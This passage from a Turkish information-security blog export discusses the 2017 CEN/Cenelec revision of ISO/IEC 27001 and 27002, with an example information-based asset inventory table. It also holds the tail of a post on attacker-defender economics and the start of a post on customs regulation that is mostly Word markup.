yapacak birçok güvenlik çözümü ve hizmeti olduğunu, bu çözümlerin sadece satın
alınmalarının yeterli olmadığını, bu nedenle konfigürasyonlarının da doğru
yapılmasının gerektiğini ve birçok güvenlik süreçlerini ve uygulamalarını
işleten kişilerin gerekli yetkinlik düzeyini sağlayabilmeleri gibi zorluklarla
yüzleşeceklerini ifade edebiliriz. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Sonuç olarak, günümüzde saldırı
gerçekleştirebilmek için saldırı yüzeyi genişleyip kişilerin sahip olması
gereken kabiliyetler gittikçe azalmakta ve maddi gereksinimler düşük düzeyde iken,
savunanlar için güvenlik önlemlerini alabilmek için yüksek bütçe kalemleri ve
yüksek nitelikli personele ihtiyaç artmaktadır. Saldırganlar ve savunanlar
arasındaki bu mücadele tarihsel olarak günümüze kadar evrilerek gelmiştir ve
gelecekte de devam edecektir.<o:p></o:p></div>
<div style="mso-element: footnote-list;">
<!--[if !supportFootnotes]--><br clear="all" />
<hr align="left" size="1" width="33%" />
<!--[endif]-->
<br />
<div id="ftn1" style="mso-element: footnote;">
<div class="MsoFootnoteText">
<a href="file:///C:/Users/Semih/Downloads/G%C3%BCvenlik%20Ekonomisinin%20Kineti%C4%9Fi%20Ali.docx#_ftnref1" name="_ftn1" style="mso-footnote-id: ftn1;" title=""><span class="MsoFootnoteReference"><span style="mso-special-character: footnote;"><!--[if !supportFootnotes]--><span class="MsoFootnoteReference"><span style="font-family: "calibri" , "sans-serif"; font-size: 10.0pt; line-height: 107%;">[1]</span></span><!--[endif]--></span></span></a> https://www.weforum.org/agenda/2018/01/our-exposure-to-cyberattacks-is-growing-we-need-to-become-cyber-risk-ready<o:p></o:p></div>
</div>
</div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-4641628508533599712017-11-21T13:10:00.002+03:002017-11-21T13:10:53.434+03:00CEN/Cenelec ISO/IEC 27001:2017 Revizyonu<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Bilindiği üzere ülkemizde ISO 27001 standardının en son
kabul edilen ve Türkçe’ye çevirisi yapılan versiyonu TS ISO/IEC 27001:2013
Bilgi Güvenliği Yönetim Sistemi standardıdır. ISO her 5 yılda bir uluslararası standartları
gözden geçirerek, zaman içerisinde oluşan ihtiyaçlar doğrultusunda revize etmektedir.
<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">ISO/IEC 27001:2013 standardında da CEN (Avrupa Standardizasyon
Komitesi) tarafından 2017 yılında revizyona gidilmiştir. Bu standart
değişikliği ISO tarafından yapılmamış olup, CEN/Cenelec tarafından yapıldığı
için, Avrupa’daki standart düzenlemeleri için genel çerçeve oluşturmaktadır.
Yani <b>bölgesel bir düzenlemedir.</b><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Yapılan revizyona göre yeni standart BS EN ISO/IEC 27001:2017 olarak yayınlanmıştır. Ülkemizde ise halen <b>TS ISO/IEC 27001:2013 standardı
geçerliliğini korumaktadır ve</b> <b>bu standarda göre belgelendirme yapılmaktadır.</b><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: inherit;"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Ancak bu değişikliklerin ISO tarafından da periyodik
revizyonlarda dikkate alınacağını değerlendirerek, ISO 27001 standardında
yapılan değişiklikleri bu yazımızda ele almak istiyoruz.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">ISO 27001 revizyonu ile birlikte; ISO 27002 ve ISO 27000
standartlarında da revize gerçekleşmiştir. ISO 27002 kapsamında iki temel
kontrol maddesinde aşağıdaki değişiklikler yapılmıştır.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: inherit;">8.1.1 Varlık
Envanteri<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><u>Kontrol -2013 Versiyon</u><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Bilgi ve bilgi işleme olanakları ile ilgili varlıklar
belirlenmeli ve bu varlıkların bir envanteri çıkarılmalı ve idame
ettirilmelidir.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<i><span style="font-family: inherit;"><br /></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<i><span style="font-family: inherit;">Assets associated with
information and information processing facilities shall be identified and an
inventory of these assets shall be drawn up and maintained.<o:p></o:p></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><u>Kontrol -2017 Versiyon</u><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<u><span style="font-family: inherit;"><br /></span></u></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Bilgi ve bilgiye ilişkin diğer varlıklar ile bilgi işleme
olanakları ve ilgili varlıklar belirlenmeli ve bu varlıkların bir envateri
çıkarılmalı ve idame ettirilmelidir.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<i><span style="font-family: inherit;">Information, other
assets associated with information and information processing facilities should
be identified and an inventory of these assets should be drawn up and
maintained.<o:p></o:p></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<i><span style="font-family: inherit;"><br /></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Bu değişikliğe göre varlık envanteri yaklaşımının bilgiler
üzerine kurulması esas teşkil edecektir. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Uygulama açısından bakıldığında varlıkları; “bilgi” temelinde sınıflandırıp, envanterde bu
bilgileri temel alarak, işleme olanakları ve ilişkili tüm varlıklara yer verme
yöntemi izlenebilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b><i><span style="font-family: inherit;"><br /></span></i></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><i><span style="font-family: inherit;">Örnek:<o:p></o:p></span></i></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Örneğin bilgi varlıklarına Gizlilik sınıflandırması
temelinde bakarsak, Gizlilik sınıfları için varlıkları bilgi temelli olarak
aşağıdaki gibi oluşturabiliriz.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Gizli Varlıklar :İş
Planları, Fiyat Teklifleri, Müşteri Sözleşmeleri, Kredi Kartı Bilgileri vb.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Dahili Varlıklar :Personel
Listesi, Standartlar ve Prosedürler, Ekipman Envanter Bilgileri vb.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Genel Varlıklar :Kamu
Bilgilendirmeleri, Faaliyet Raporları vb.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Varlık envanteri yöntemi içinde aynı şekilde bilgi temelli
yaklaşım oluşturulabilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><b><i>Örnek:</i></b> <o:p></o:p></span></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: -.15pt; mso-padding-alt: 0cm 0cm 0cm 0cm; mso-yfti-tbllook: 1184; width: 0px;">
<tbody>
<tr style="height: 15.0pt; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="background: yellow; border: solid windowtext 1.0pt; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 56.35pt;" valign="bottom" width="75">
<div class="MsoNormal">
Bilgi<o:p></o:p></div>
</td>
<td nowrap="" style="background: yellow; border-left: none; border: solid windowtext 1.0pt; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 64.65pt;" valign="bottom" width="87">
<div class="MsoNormal">
İlişkili Varlıklar<o:p></o:p></div>
</td>
<td nowrap="" style="background: yellow; border-left: none; border: solid windowtext 1.0pt; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 126.75pt;" valign="bottom" width="169">
<div class="MsoNormal">
Açıklama<o:p></o:p></div>
</td>
<td nowrap="" style="background: yellow; border-left: none; border: solid windowtext 1.0pt; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 63.75pt;" valign="bottom" width="85">
<div class="MsoNormal">
Kategori<o:p></o:p></div>
</td>
<td nowrap="" style="background: yellow; border-left: none; border: solid windowtext 1.0pt; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 42.55pt;" valign="bottom" width="57">
<div class="MsoNormal">
Gizlilik <o:p></o:p></div>
</td>
<td nowrap="" style="background: yellow; border-left: none; border: solid windowtext 1.0pt; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 51.15pt;" valign="bottom" width="69">
<div class="MsoNormal">
Bütünlük<o:p></o:p></div>
</td>
<td nowrap="" style="background: yellow; border-left: none; border: solid windowtext 1.0pt; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 64.6pt;" valign="bottom" width="87">
<div class="MsoNormal">
Erişilebilirlik<o:p></o:p></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 1;">
<td rowspan="3" style="border-top: none; border: solid windowtext 1.0pt; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 56.35pt;" width="75">
<div align="center" class="MsoNormal" style="text-align: center;">
<b>Personel
Özlük Bilgileri<o:p></o:p></b></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 64.65pt;" valign="bottom" width="87">
<div class="MsoNormal">
Özlük dosyası<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 126.75pt;" valign="bottom" width="169">
<div class="MsoNormal">
Özlük bilgilerinin
tutulduğu klasörler<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 63.75pt;" valign="bottom" width="85">
<div class="MsoNormal">
Basılı bilgiler<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 42.55pt;" valign="bottom" width="57">
<div class="MsoNormal">
Gizli<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 51.15pt;" valign="bottom" width="69">
<div class="MsoNormal">
Yüksek<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 64.6pt;" valign="bottom" width="87">
<div class="MsoNormal">
Orta<o:p></o:p></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 2;">
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 64.65pt;" valign="bottom" width="87">
<div class="MsoNormal">
Bordrolama personeli<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 126.75pt;" valign="bottom" width="169">
<div class="MsoNormal">
Bordroloma işini yapan
yetkin personel kaynağı<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 63.75pt;" valign="bottom" width="85">
<div class="MsoNormal">
İnsan Kaynağı<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 42.55pt;" valign="bottom" width="57">
<div class="MsoNormal">
-<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 51.15pt;" valign="bottom" width="69">
<div class="MsoNormal">
-<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 15.0pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 64.6pt;" valign="bottom" width="87">
<div class="MsoNormal">
Yüksek<o:p></o:p></div>
</td>
</tr>
<tr style="height: 32.25pt; mso-yfti-irow: 3; mso-yfti-lastrow: yes;">
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 32.25pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 64.65pt;" valign="bottom" width="87">
<div class="MsoNormal">
HR Uygulaması<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 32.25pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 126.75pt;" valign="bottom" width="169">
<div class="MsoNormal">
Özlük bilgilerinin
tutulduğu ve işlendiği uygulama<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 32.25pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 63.75pt;" valign="bottom" width="85">
<div class="MsoNormal">
Bilgi sistemleri<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 32.25pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 42.55pt;" valign="bottom" width="57">
<div class="MsoNormal">
Gizli<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 32.25pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 51.15pt;" valign="bottom" width="69">
<div class="MsoNormal">
Yüksek<o:p></o:p></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 32.25pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 64.6pt;" valign="bottom" width="87">
<div class="MsoNormal">
Yüksek<o:p></o:p></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><b>8.1.3 Varlıkların Kabul Edilebilir Kullanımı</b><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><u>Uygulama Rehberi -2013 Versiyon</u><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<u><span style="font-family: inherit;"><br /></span></u></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Kuruluşun varlıklarını kullanan veya bunlara erişimi olan
çalışanlar ve dış taraf kullanıcılar, bilgi ve bilgi işleme tesisleri ve
kaynakları ile ilişkili kuruluşun varlıklarının bilgi güvenliği gereksinimleri
hakkında farkındalıkları sağlanmalıdır. Bu kullanıcılar tüm bilgi işleme
kaynaklarının kullanımından ve kendi sorumlulukları altında gerçekleşen tüm
kullanımlardan sorumlu olmalıdır.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<i><span style="font-family: inherit;">Employees and external
party users using or having access to the organization’s assets should be made
aware of the information security requirements of the organization’s assets
associated with information and information processing facilities and
resources. They should be responsible for their use of any information
processing resources and of any such use carried out under their responsibility<o:p></o:p></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<i><span style="font-family: inherit;"><br /></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><u>Uygulama Rehberi -2017 Versiyon</u><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<u><span style="font-family: inherit;"><br /></span></u></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Kuruluşun varlıklarını kullanan veya bunlara erişimi olan
çalışanlar ve dış taraf kullanıcılar, bilgi ve bilgi işleme tesisleri ve
kaynakları ile ilişkili kuruluşun varlıklarının bilgi güvenliği gereksinimleri
hakkında farkındalıkları sağlanmalıdır.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<i><span style="font-family: inherit;">Employees and external
party users using or having access to the organization’s assets should be made
aware of the information security requirements of the organization’s assets
associated with information and information processing facilities and
resources.<o:p></o:p></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<i><span style="font-family: inherit;"><br /></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;">Bu değişikliğe göre; “<span class="fontstyle01"><span style="line-height: 107%;">Bu kullanıcılar tüm bilgi işleme
kaynaklarının kullanımından ve kendi sorumlulukları altında</span></span> <span class="fontstyle01"><span style="line-height: 107%;">gerçekleşen tüm kullanımlardan sorumlu olmalıdır.” ifadesi ISO
27002 uygulama rehberi tanımlamasından çıkartılmıştır.<o:p></o:p></span></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<br />
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: inherit;"><span class="fontstyle01"><span style="line-height: 107%;">Kaynaklar: </span></span><a href="https://www.bsigroup.com/">https://www.bsigroup.com</a></span><span class="fontstyle01"><span style="font-family: "Calibri",sans-serif; line-height: 107%; mso-ansi-font-size: 11.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><o:p></o:p></span></span></div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-4655789330716041272017-10-31T09:30:00.000+03:002017-10-31T09:30:11.049+03:00Gümrük İşlemlerinin Kolaylaştırılması Yönetmeliği- ISO 27001 Kapsam Değişikliği<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><br />
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
